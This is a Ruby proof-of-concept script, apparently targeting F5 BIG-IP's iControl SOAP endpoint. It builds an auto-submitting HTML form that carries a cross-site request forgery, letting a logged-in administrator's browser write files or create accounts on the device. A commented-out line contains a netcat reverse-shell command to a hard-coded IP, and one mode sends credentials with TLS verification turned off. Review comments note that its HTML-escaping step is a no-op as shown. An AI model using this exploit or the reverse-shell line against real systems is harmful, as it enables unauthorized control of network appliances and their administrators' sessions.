require 'httparty'
require 'base64'
# Print the command-line synopsis to stderr and terminate the script.
#
# Used as the fallback for every missing positional argument below, so it
# never returns to its caller.
def usage
  synopsis = "ruby #{$0} <target> <xml_template> [username:password]"
  $stderr.puts synopsis
  exit
end
# --- Argument handling --------------------------------------------------------
# First positional argument: the host the iControl URL is built from.
# usage() exits, so TARGET is never nil past this line.
TARGET = ARGV[0] || usage()
TARGET_URL = "https://#{ TARGET }/iControl/iControlPortal.cgi"
# Second positional argument: path of the XML template containing
# %%%NAME%%% placeholders (see the gsub below).
TEMPLATE_FILE = ARGV[1] || usage()
begin
TEMPLATE = File.read(TEMPLATE_FILE)
rescue StandardError => e
# NOTE(review): any StandardError raised by File.read (permission denied, a
# directory, an encoding error) lands here, yet the message always says
# "File not found"; `e` itself is never reported.
$stderr.puts "File not found: #{ TEMPLATE_FILE }"
$stderr.puts
usage()
end
# Optional third argument, "username:password". When present the filled-in
# request is POSTed directly (authenticated mode); when absent an HTML page is
# written to stdout instead (see the if/else at the bottom).
ACCOUNT = ARGV[2]
if ACCOUNT
$stderr.puts "NOTE: You've provided a username and password, which means this is going"
$stderr.puts "to authenticate, and therefore isn't an exploit"
$stderr.puts
$stderr.puts "Don't enter a username:password if you want to generate a CSRF exploit!"
end
# Set up some defaults
# Fallback values for the template placeholders, keyed by the bare placeholder
# name (the text between the %%% markers). Used when the prompt below gets an
# empty line or EOF. A placeholder not listed here falls back to nil.
DEFAULTS = {
'FILENAME' => '/tmp/csrfdemo.txt',
'BASE64FILEDATA' => 'SGVsbG8gd29ybGQh',
'USERNAME' => 'rontest',
'FULLNAME' => 'Ron Test',
'CRYPTSHA512HASH' => '$6$T2mT4PeYSuyg/hSr$y/rN9tol5t1fRxTBqFVtxLzRfUBXt16yNahqYTaVVZa3PITfoAKBnuzqvwBT77qNBV4JjgwdhzqmsMk78bo6d0', # "Password1"
'FROM_FILENAME' => '/tmp/file1',
'TO_FILENAME' => '/tmp/file2',
}
#COMMAND = "nc -e /bin/bash 10.0.0.146 4444 2>&1 > /dev/null &"
# Milliseconds before the generated page submits its form (passed to
# setTimeout in the HTML below).
DELAY = 1000
# Fill in the template
# Each %%%NAME%%% token in TEMPLATE is replaced interactively: the prompt goes
# to stderr (so stdout stays clean for the HTML output), one line is read from
# stdin, and an empty line or EOF selects DEFAULTS[var].
REQUEST = TEMPLATE.gsub(/%%%[a-zA-Z0-9_]+%%%/) do |var|
# Strip the %%% delimiters in place, leaving the bare placeholder name.
var.gsub!(/%/, '')
$stderr.print "Value for #{ var } [#{ DEFAULTS[var] }]: "
$stderr.flush
# gets returns nil at EOF, hence the safe navigation before chomp.
val = $stdin.gets&.chomp
if !val || val.length == 0
# May be nil for a placeholder with no default; gsub then substitutes an
# empty string for the block result.
val = DEFAULTS[var]
end
val
end
if ACCOUNT
# Authenticated mode: send the filled-in XML straight to the target and echo
# the response on stderr.
$stderr.puts "Sending the following payload directly to #{ TARGET }..."
$stderr.puts
$stderr.puts REQUEST
response = HTTParty.post(
TARGET_URL,
# verify: false disables TLS certificate verification; the credentials in the
# header below are then not protected against an on-path interceptor.
verify: false,
headers: {
# NOTE(review): the value is bare base64 of "user:pass" with no "Basic "
# scheme prefix, and Base64.encode64 appends a trailing newline (and wraps
# at 60 characters) — confirm this is what the endpoint expects.
authorization: Base64::encode64(ACCOUNT),
'content-type': 'text/xml',
},
body: REQUEST
)
$stderr.puts
$stderr.puts "Response:"
$stderr.puts response
$stderr.puts
$stderr.puts '---'
# A response body containing "error_string" is treated as a failure: the rest
# of that line is reported and the script exits non-zero.
if response.body =~ /(error_string.*)/
$stderr.puts "Something went wrong:"
$stderr.puts
# $1 is the first capture group of the =~ match above.
$stderr.puts $1
exit 1
end
else
# Page-generation mode: write an HTML document to stdout whose form the
# embedded script submits after DELAY milliseconds, with REQUEST as the
# textarea content.
# NOTE(review): the two gsub calls below replace a character with itself and
# therefore change nothing as rendered here — probably an escaping step lost
# in extraction; confirm against the original file.
puts %{
<form id="form" method="post" action="#{ TARGET_URL }" enctype="text/plain">
<textarea id="payload" name="<!--">-->#{ REQUEST.gsub(/</, '<').gsub(/>/, '>') }</textarea>
<input type=submit>
</form>
<script>
setTimeout(function() {
document.getElementById("form").submit();
}, #{ DELAY });
</script>
}
end